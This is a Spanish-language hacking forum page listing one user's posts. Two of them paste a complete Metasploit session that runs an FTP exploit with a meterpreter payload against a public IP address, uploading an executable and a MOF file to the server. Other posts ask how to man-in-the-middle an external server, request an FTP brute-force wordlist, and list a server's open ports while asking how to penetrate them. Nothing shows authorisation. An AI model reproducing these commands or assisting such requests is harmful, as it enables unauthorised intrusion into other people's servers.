Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - condordkl

#1
Bugs y Exploits / Explicacion de un exploit.
9 Septiembre 2014, 16:12 PM
Buenas.. Ayer desde Armitage corriendo el sistema operativo de Kali linux, ejecute un Exploit para un servidor que corría el servicio de FTP, el tema es que sinceramente no entiendo el funcionamiento del mismo. Espero que alguien me pueda explicar. GRACIAS!

msf > use exploit/windows/ftp/open_ftpd_wbem
msf exploit(open_ftpd_wbem) > set SSLVersion SSL3
SSLVersion => SSL3
msf exploit(open_ftpd_wbem) > set LHOST 192.168.0.11
LHOST => 192.168.0.11
msf exploit(open_ftpd_wbem) > set RPORT 21
RPORT => 21
msf exploit(open_ftpd_wbem) > set LPORT 15498
LPORT => 15498
msf exploit(open_ftpd_wbem) > set SSL 0
SSL => 0
msf exploit(open_ftpd_wbem) > set SRVPORT 8080
SRVPORT => 8080
msf exploit(open_ftpd_wbem) > set RHOST (IP DEL SERVIDOR)
RHOST => 190.183.59.228
msf exploit(open_ftpd_wbem) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(open_ftpd_wbem) > set TARGET 0
TARGET => 0
msf exploit(open_ftpd_wbem) > set SRVHOST 0.0.0.0
SRVHOST => 0.0.0.0
msf exploit(open_ftpd_wbem) > set PATH C:/WINDOWS/
PATH => C:/WINDOWS/
msf exploit(open_ftpd_wbem) > exploit -j
  • Exploit running as background job.
  • Started bind handler
  • Server started.
  • (IPSERVIDOR):21 - Trying to upload ctBqvLiiKaTFnm.exe
  • (IPSERVIDOR):21 - Set binary mode
  • (IPSERVIDOR)21 - Set active mode "192,168,0,11,31,144"
  • (IPSERVIDOR):21 - Upload successful
  • (IPSERVIDOR):21 - Trying to upload dwEoqTj.mof
  • (IPSERVIDOR):21 - Set binary mode
  • (IPSERVIDOR):21 - Set active mode "192,168,0,11,31,144"
  • (IPSERVIDOR):21 - Upload successful[/b][/i]
#2
Hacking / DUDA. Man in de Middle
7 Septiembre 2014, 16:42 PM
Buenas, mi duda es la siguiente se puede realizar un ataque de "man in de middle" a un servidor externo que no este dentro de la misma red? si es posible como realizar este ataque?. Muchas Gracias
#3
Hacking / Explicacion de un exploit. ayuda.
7 Septiembre 2014, 16:38 PM
Buenas.. Ayer desde Armitage corriendo el sistema operativo de Kali linux, ejecute un Exploit para un servidor que corría el servicio de FTP, el tema es que sinceramente no entiendo el funcionamiento del mismo. Espero que alguien me pueda explicar. GRACIAS!

msf > use exploit/windows/ftp/open_ftpd_wbem
msf exploit(open_ftpd_wbem) > set SSLVersion SSL3
SSLVersion => SSL3
msf exploit(open_ftpd_wbem) > set LHOST 192.168.0.11
LHOST => 192.168.0.11
msf exploit(open_ftpd_wbem) > set RPORT 21
RPORT => 21
msf exploit(open_ftpd_wbem) > set LPORT 15498
LPORT => 15498
msf exploit(open_ftpd_wbem) > set SSL 0
SSL => 0
msf exploit(open_ftpd_wbem) > set SRVPORT 8080
SRVPORT => 8080
msf exploit(open_ftpd_wbem) > set RHOST (IP DEL SERVIDOR)
RHOST => 190.183.59.228
msf exploit(open_ftpd_wbem) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(open_ftpd_wbem) > set TARGET 0
TARGET => 0
msf exploit(open_ftpd_wbem) > set SRVHOST 0.0.0.0
SRVHOST => 0.0.0.0
msf exploit(open_ftpd_wbem) > set PATH C:/WINDOWS/
PATH => C:/WINDOWS/
msf exploit(open_ftpd_wbem) > exploit -j
  • Exploit running as background job.
  • Started bind handler
  • Server started.
  • (IPSERVIDOR):21 - Trying to upload ctBqvLiiKaTFnm.exe
  • (IPSERVIDOR):21 - Set binary mode
  • (IPSERVIDOR)21 - Set active mode "192,168,0,11,31,144"
  • (IPSERVIDOR):21 - Upload successful
  • (IPSERVIDOR):21 - Trying to upload dwEoqTj.mof
  • (IPSERVIDOR):21 - Set binary mode
  • (IPSERVIDOR):21 - Set active mode "192,168,0,11,31,144"
  • (IPSERVIDOR):21 - Upload successful[/b][/i]
#4
Hacking / Diccionario fuerza bruta
6 Septiembre 2014, 04:04 AM
Hola!, necesito si alguien tiene un link para descargar un buen diccionario completo para fuerza bruta a un FTP!, gracias de antemano!!!
#5
Buenas, necesito ayuda con estos programas, hace unos dias que me lo descargue y lo pude usar solo una vez, reinicie el sistema y al prender el programa me tiro un mensaje diciendo que vea precisamente los "Message Log" y encontré esto:  :huh: :huh:


Sep 05 21:20:06.274 [Notice] Tor v0.2.4.23 (git-417f0cacd726e549) running on Linux with Libevent 2.0.19-stable and OpenSSL 1.0.1e.
Sep 05 21:20:06.274 [Notice] Tor can't help you if you use it wrong! Learn how to be safe at https://www.torproject.org/download/download#warning
Sep 05 21:20:06.274 [Notice] Read configuration file "/root/.vidalia/torrc".
Sep 05 21:20:06.275 [Notice] Opening Socks listener on 127.0.0.1:9050
Sep 05 21:20:06.275 [Warning] Directory /var/run/tor does not exist.
Sep 05 21:20:06.275 [Warning] Before Tor can create a control socket in "/var/run/tor/control", the directory "/var/run/tor" needs to exist, and to be accessible only by the user account that is running Tor.  (On some Unix systems, anybody who can list a socket can connect to it, so Tor is being careful.)
Sep 05 21:20:06.275 [Notice] Closing partially-constructed Socks listener on 127.0.0.1:9050
Sep 05 21:20:06.275 [Warning] Failed to parse/validate config: Failed to bind one of the listener ports.
Sep 05 21:20:06.275 [Error] Reading config failed--see warnings above.


Sinceramente me gustaría poder seguir utilizando la aplicación y que me den una mano. Muchas gracias de antemano.  ;D
#6
Buenas tardes, estoy actualizandome un poco con el tema de seguridad informatica puesto que hace años que la abandone.

Recientemente estoy probando Kali Linux y tengo unas dudas con si hay vulnerabilidades para penetrar por los siguiente puertos. Gracias de antemano..

El servidor tiene abierto los siguiente puertos:
20/tcp   closed ftp-data
21/tcp   open   ftp
25/tcp   open   smtp
53/tcp   open   domain
80/tcp   open   http
110/tcp  open   pop3
143/tcp  closed imap
443/tcp  open   https
587/tcp  open   submission
1010/tcp open   surf
1433/tcp open   ms-sql-s
1723/tcp closed pptp
2222/tcp closed EtherNet/IP-1
2525/tcp open   ms-v-worlds
3306/tcp open   mysql
8080/tcp closed http-proxy
8086/tcp closed d-s-n
9001/tcp closed tor-orport

Espero que puedan ayudarme..